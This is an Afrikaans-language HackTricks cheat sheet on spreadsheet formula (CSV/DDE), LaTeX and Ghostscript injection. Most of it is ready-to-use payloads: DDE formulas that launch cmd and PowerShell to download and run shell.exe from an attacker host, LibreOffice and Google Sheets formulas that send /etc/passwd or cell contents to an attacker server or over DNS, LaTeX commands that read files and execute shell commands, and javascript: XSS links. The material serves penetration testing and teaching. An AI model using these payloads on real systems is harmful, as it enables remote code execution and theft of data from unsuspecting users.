12 KiB
Formula/CSV/Doc/LaTeX/GhostScript Injection
{% hint style="success" %}
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
Try Hard Security Group
{% embed url="https://discord.gg/tryhardsecurity" %}
Formula Injection
Info
As jou invoer binne CSV lêers (of enige ander lêer wat waarskynlik deur Excel geopen gaan word) reflekteer word, kan jy dalk Excel formules plaas wat uitgevoer sal word wanneer die gebruiker die lêer open of wanneer die gebruiker op 'n skakel binne die excel bladsy klik.
{% hint style="danger" %} Tans sal Excel waarsku (verskeie kere) die gebruiker wanneer iets van buite die Excel gelaai word om te voorkom dat hy kwaadwillige aksies onderneem. Daarom moet spesiale moeite in Sosiale Ingenieurswese toegepas word op die finale payload. {% endhint %}
Wordlist
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
Hyperlink
Die volgende voorbeeld is baie nuttig om inhoud uit die finale excel-skaak te onttrek en om versoeke na arbitrêre plekke te doen. Maar dit vereis dat die gebruiker op die skakel klik (en die waarskuwingstoets aanvaar).
Die volgende voorbeeld is geneem van https://payatu.com/csv-injection-basic-to-exploit
Stel jou 'n sekuriteitsbreuk in 'n Student Record Management-stelsel voor wat deur 'n CSV-inspuitaanval uitgebuit word. Die aanvaller se primêre bedoeling is om die stelsel wat deur onderwysers gebruik word om studentedetails te bestuur, te kompromitteer. Die metode behels dat die aanvaller 'n kwaadwillige payload in die toepassing inspuit, spesifiek deur skadelike formules in velde wat vir studentedetails bedoel is, in te voer. Die aanval ontvou soos volg:
- Inspuiting van Kwaadwillige Payload:
- Die aanvaller dien 'n studentedetailvorm in, maar sluit 'n formule in wat algemeen in sigblaaie gebruik word (bv.
=HYPERLINK("<malicious_link>","Click here")
). - Hierdie formule is ontwerp om 'n hyperlink te skep, maar dit wys na 'n kwaadwillige bediener wat deur die aanvaller beheer word.
- Uitvoer van Gecompromitteerde Data:
- Onderwysers, onbewus van die kompromie, gebruik die toepassing se funksionaliteit om die data in 'n CSV-lêer uit te voer.
- Die CSV-lêer, wanneer dit geopen word, bevat steeds die kwaadwillige payload. Hierdie payload verskyn as 'n klikbare hyperlink in die sigblaar.
- Aktivering van die Aanval:
- 'n Onderwyser klik op die hyperlink, in die geloof dat dit 'n legitieme deel van die student se besonderhede is.
- By die klik word sensitiewe data (potensieel insluitend besonderhede van die sigblaar of die onderwyser se rekenaar) na die aanvaller se bediener oorgedra.
- Teken van die Data:
- Die aanvaller se bediener ontvang en teken die sensitiewe data wat van die onderwyser se rekenaar gestuur is.
- Die aanvaller kan dan hierdie data vir verskeie kwaadwillige doeleindes gebruik, wat die privaatheid en sekuriteit van die studente en die instelling verder kompromitteer.
RCE
Kyk na die oorspronklike pos vir verdere besonderhede.
In spesifieke konfigurasies of ouer weergawes van Excel kan 'n funksie genaamd Dynamic Data Exchange (DDE) uitgebuit word om arbitrêre opdragte uit te voer. Om hiervan gebruik te maak, moet die volgende instellings geaktiveer word:
- Navigeer na File → Options → Trust Center → Trust Center Settings → External Content, en aktiveer Dynamic Data Exchange Server Launch.
Wanneer 'n sigblaar met die kwaadwillige payload geopen word (en as die gebruiker die waarskuwings aanvaar), word die payload uitgevoer. Byvoorbeeld, om die sakrekenaar-toepassing te begin, sou die payload wees:
=cmd|' /C calc'!xxx
Aanvullende opdragte kan ook uitgevoer word, soos om 'n lêer af te laai en uit te voer met PowerShell:
=cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1
Lokale Lêer Insluiting (LFI) in LibreOffice Calc
LibreOffice Calc kan gebruik word om plaaslike lêers te lees en data te exfiltreer. Hier is 'n paar metodes:
- Lees die eerste lyn van die plaaslike
/etc/passwd
lêer:='file:///etc/passwd'#$passwd.A1
- Exfiltreer die geleesde data na 'n aanvaller-beheerde bediener:
=WEBSERVICE(CONCATENATE("http://<attacker IP>:8080/",('file:///etc/passwd'#$passwd.A1)))
- Exfiltreer meer as een lyn:
=WEBSERVICE(CONCATENATE("http://<attacker IP>:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))
- DNS exfiltrasie (stuur geleesde data as DNS navrae na 'n aanvaller-beheerde DNS bediener):
=WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),".<attacker domain>"))
Google Sheets vir Out-of-Band (OOB) Data Exfiltrasie
Google Sheets bied funksies wat uitgebuit kan word vir OOB data exfiltrasie:
- CONCATENATE: Voeg strings saam -
=CONCATENATE(A2:E2)
- IMPORTXML: Importeer data van gestruktureerde datatipes -
=IMPORTXML(CONCAT("http://<attacker IP:Port>/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")
- IMPORTFEED: Importeer RSS of ATOM feeds -
=IMPORTFEED(CONCAT("http://<attacker IP:Port>//123.txt?v=", CONCATENATE(A2:E2)))
- IMPORTHTML: Importeer data van HTML tabelle of lyste -
=IMPORTHTML (CONCAT("http://<attacker IP:Port>/123.txt?v=", CONCATENATE(A2:E2)),"table",1)
- IMPORTRANGE: Importeer 'n reeks selle van 'n ander sigblad -
=IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Sheet_Id]", "sheet1!A2:E2")
- IMAGE: Voeg 'n beeld in 'n sel in -
=IMAGE("https://<attacker IP:Port>/images/srpr/logo3w.png")
LaTeX Inspuiting
Gewoonlik gebruik die bedieners wat op die internet gevind word wat LaTeX kode na PDF omskakel pdflatex
.
Hierdie program gebruik 3 hoofkenmerke om (nie)opdraguitvoering toe te laat nie:
--no-shell-escape
: Deaktiveer die\write18{command}
konstruksie, selfs al is dit geaktiveer in die texmf.cnf lêer.--shell-restricted
: Dieselfde as--shell-escape
, maar beperk tot 'n 'veilige' stel voorgedefinieerde **opdragte (**Op Ubuntu 16.04 is die lys in/usr/share/texmf/web2c/texmf.cnf
).--shell-escape
: Aktiveer die\write18{command}
konstruksie. Die opdrag kan enige skulpopdrag wees. Hierdie konstruksie word normaalweg om veiligheidsredes verbied.
Daar is egter ander maniere om opdragte uit te voer, so om RCE te vermy is dit baie belangrik om --shell-restricted
te gebruik.
Lees lêer
Jy mag dalk die inspuiting met wrappers soos [ of $ moet aanpas.
\input{/etc/passwd}
\include{password} # load .tex file
\lstinputlisting{/usr/share/texmf/web2c/texmf.cnf}
\usepackage{verbatim}
\verbatiminput{/etc/passwd}
Lees enkellyn lêer
\newread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file
Lees 'n veellyn lêer
\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file
Skryf lêer
\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile
Opdrag uitvoering
Die invoer van die opdrag sal na stdin herlei word, gebruik 'n tydelike lêer om dit te verkry.
\immediate\write18{env > output}
\input{output}
\input{|"/bin/hostname"}
\input{|"extractbb /etc/passwd > /tmp/b.tex"}
# allowed mpost command RCE
\documentclass{article}\begin{document}
\immediate\write18{mpost -ini "-tex=bash -c (id;uname${IFS}-sm)>/tmp/pwn" "x.mp"}
\end{document}
# If mpost is not allowed there are other commands you might be able to execute
## Just get the version
\input{|"bibtex8 --version > /tmp/b.tex"}
## Search the file pdfetex.ini
\input{|"kpsewhich pdfetex.ini > /tmp/b.tex"}
## Get env var value
\input{|"kpsewhich -expand-var=$HOSTNAME > /tmp/b.tex"}
## Get the value of shell_escape_commands without needing to read pdfetex.ini
\input{|"kpsewhich --var-value=shell_escape_commands > /tmp/b.tex"}
As jy enige LaTex-fout kry, oorweeg dit om base64 te gebruik om die resultaat sonder slegte karakters te verkry.
\immediate\write18{env | base64 > test.tex}
\input{text.tex}
\input|ls|base4
\input{|"/bin/hostname"}
Cross Site Scripting
Van @EdOverflow
\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}
Ghostscript Injection
Kontroleer https://blog.redteam-pentesting.de/2023/ghostscript-overview/
Verwysings
- https://notsosecure.com/data-exfiltration-formula-injection-part1
- https://0day.work/hacking-with-latex/
- https://salmonsec.com/cheatsheet/latex_injection
- https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/
Probeer Hard Sekuriteitsgroep
{% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Ondersteun HackTricks
- Kontroleer die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.